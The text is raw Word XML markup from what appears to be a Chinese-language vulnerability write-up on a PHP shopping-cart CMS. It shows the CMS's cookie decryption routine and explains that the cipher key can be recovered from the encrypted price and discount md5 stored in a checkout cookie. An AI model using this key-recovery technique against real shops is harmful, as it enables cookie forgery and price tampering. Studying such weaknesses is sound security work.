            <v:rect id="_x0000_s7822" style="position:absolute;left:2392;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7821" style="position:absolute;left:2513;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7820" style="position:absolute;left:2633;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7819" style="position:absolute;left:2754;top:2204;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7818" style="position:absolute;left:4682;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7817" style="position:absolute;left:4802;top:2204;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7816" style="position:absolute;left:5405;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7815" style="position:absolute;left:5525;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7814" style="position:absolute;left:5;top:2467;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7813" style="position:absolute;left:185;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7812" style="position:absolute;left:285;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7811" style="position:absolute;left:385;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7810" style="position:absolute;left:485;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7809" style="position:absolute;left:585;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7808" style="position:absolute;left:685;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7807" style="position:absolute;left:785;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7806" style="position:absolute;left:885;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7805" style="position:absolute;left:985;top:2530;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7804" style="position:absolute;left:1587;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7803" style="position:absolute;left:1708;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7802" style="position:absolute;left:1828;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7801" style="position:absolute;left:1949;top:2530;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7800" style="position:absolute;left:3756;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7799" style="position:absolute;left:3877;top:2530;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7798" style="position:absolute;left:4238;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7797" style="position:absolute;left:4359;top:2530;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7796" style="position:absolute;left:5;top:2793;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7795" style="position:absolute;left:185;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7794" style="position:absolute;left:285;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7793" style="position:absolute;left:385;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7792" style="position:absolute;left:485;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7791" style="position:absolute;left:585;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7790" style="position:absolute;left:685;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7789" style="position:absolute;left:785;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7788" style="position:absolute;left:885;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7787" style="position:absolute;left:985;top:2856;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7786" style="position:absolute;left:1949;top:2856;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7785" style="position:absolute;left:2069;top:2856;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7784" style="position:absolute;left:2190;top:2856;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7783" style="position:absolute;left:2310;top:2856;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7782" style="position:absolute;left:3997;top:2856;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7781" style="position:absolute;left:4118;top:2856;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7780" style="position:absolute;left:4479;top:2856;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7779" style="position:absolute;left:4600;top:2856;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7778" style="position:absolute;left:5;top:3119;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7777" style="position:absolute;left:185;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7776" style="position:absolute;left:285;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7775" style="position:absolute;left:385;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7774" style="position:absolute;left:485;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7773" style="position:absolute;left:585;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7772" style="position:absolute;left:685;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7771" style="position:absolute;left:785;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7770" style="position:absolute;left:885;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7769" style="position:absolute;left:985;top:3182;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7768" style="position:absolute;left:1587;top:3182;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7767" style="position:absolute;left:1708;top:3182;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7766" style="position:absolute;left:1828;top:3182;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7765" style="position:absolute;left:1949;top:3182;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7764" style="position:absolute;left:3636;top:3182;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7763" style="position:absolute;left:3756;top:3182;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7762" style="position:absolute;left:3877;top:3182;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7761" style="position:absolute;left:3997;top:3182;width:1808;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7760" style="position:absolute;left:5;top:3445;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7759" style="position:absolute;left:185;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7758" style="position:absolute;left:285;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7757" style="position:absolute;left:385;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7756" style="position:absolute;left:485;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7755" style="position:absolute;left:585;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7754" style="position:absolute;left:685;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7753" style="position:absolute;left:785;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7752" style="position:absolute;left:885;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7751" style="position:absolute;left:985;top:3508;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7750" style="position:absolute;left:5;top:3771;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7749" type="#_x0000_t75" style="position:absolute;left:185;top:3834;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s7748" style="position:absolute;left:5;top:4097;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7747" type="#_x0000_t75" style="position:absolute;left:185;top:4160;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s7746" style="position:absolute;left:585;top:4160;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7745" style="position:absolute;left:1428;top:4160;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7744" style="position:absolute;left:1549;top:4160;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7743" style="position:absolute;left:1669;top:4160;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7742" style="position:absolute;left:1790;top:4160;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7741" style="position:absolute;left:3597;top:4160;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7740" style="position:absolute;left:3718;top:4160;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7739" style="position:absolute;left:3959;top:4160;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7738" style="position:absolute;left:4079;top:4160;width:1808;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7737" style="position:absolute;left:5887;top:4160;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7736" style="position:absolute;left:6007;top:4160;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7735" style="position:absolute;left:6128;top:4160;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7734" style="position:absolute;left:5;top:4423;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7733" style="position:absolute;left:185;top:4486;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7732" style="position:absolute;left:2354;top:4486;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7731" style="position:absolute;left:2474;top:4486;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7730" style="position:absolute;left:2715;top:4486;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7729" style="position:absolute;left:2836;top:4486;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7728" style="position:absolute;left:5;top:4749;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7727" type="#_x0000_t75" style="position:absolute;left:185;top:4812;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s7726" style="position:absolute;left:585;top:4812;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7725" style="position:absolute;left:1308;top:4812;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7724" style="position:absolute;left:1428;top:4812;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7723" style="position:absolute;left:5;top:5075;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7722" style="position:absolute;left:185;top:5138;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7721" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:5581" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="8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579" w:right="301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$mod4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strlen(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$data) % 4; if ($mod4) {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="198" w:lineRule="exact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data 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substr('====', $mod4);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$string = base64_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decode(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$data);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="7"/>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="14"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1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strlen($string); $i++) {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$string, $i, 1);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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$keychar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$clear, $i, 1);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chr(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ord($char) - ord($keychar));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$char;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608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$result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$result, 1, strlen($result) - 1).substr($result, 0, 1);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="198" w:lineRule="exact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$result;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5"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="35" w:line="271" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="417"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>好吧，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>虽</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-87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key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>得找到足</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>够长</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的明文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia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和相</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的密文才可以得到完整的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia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key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>毕</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>竟如果明文和密文都没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia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key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>长，还原得到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-59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key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>也是不完整的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="25"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="268" w:lineRule="auto"/>
        <w:ind w:right="415"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s7719" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:49.35pt;width:337.5pt;height:148.65pt;z-index:601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6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in_orderpay() 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parent::start_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>pagetemplate(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928" w:right="501" w:hanging="917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($this-&gt;CON['order_ismember']) { parent::member_purview(0,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$this-</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>mlink[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'orderpay']);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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$lng = (admin_LNG == 'big5'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>) ?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CON[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'is_lancode'] : admin_LNG;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  <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>购</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>物</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>车结</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，程序会把当前物品的价格和折扣</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-87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md5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后加密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后放到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-61"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-27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里，所以我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可以保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>推算出最多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-59"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-28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位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>长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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-61"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
